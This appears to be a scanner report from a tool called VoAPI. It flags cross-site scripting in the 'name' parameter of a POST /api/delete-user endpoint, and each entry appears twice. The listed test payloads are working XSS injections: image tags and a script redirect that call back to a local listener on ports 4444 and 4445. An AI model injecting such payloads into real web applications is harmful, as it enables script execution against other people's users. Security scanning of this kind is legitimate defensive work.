-------- VoAPI Vul API --------
API Vul Type: xss
Vul API Url: /api/delete-user
Vul API Method: Post
API Vul Param: name
API Test Payload: <img src='http://127.0.0.1:4444/xss/api/delete-userVoAPIname'>

API Vul Type: xss
Vul API Url: /api/delete-user
Vul API Method: Post
API Vul Param: name
API Test Payload: <img src='http://127.0.0.1:4444/xss/api/delete-userVoAPIname'>

-------- VoAPI Vul API --------
API Vul Type: xss
Vul API Url: /api/delete-user
Vul API Method: Post
API Vul Param: name
API Test Payload: <img src='https://127.0.0.1:4445/xss/api/delete-userVoAPIname'>

API Vul Type: xss
Vul API Url: /api/delete-user
Vul API Method: Post
API Vul Param: name
API Test Payload: <img src='https://127.0.0.1:4445/xss/api/delete-userVoAPIname'>

-------- VoAPI Vul API --------
API Vul Type: xss
Vul API Url: /api/delete-user
Vul API Method: Post
API Vul Param: name
API Test Payload: <script>window.location='http://127.0.0.1:4444/xss/api/delete-userVoAPIname'</script>

API Vul Type: xss
Vul API Url: /api/delete-user
Vul API Method: Post
API Vul Param: name
API Test Payload: <script>window.location='http://127.0.0.1:4444/xss/api/delete-userVoAPIname'</script>

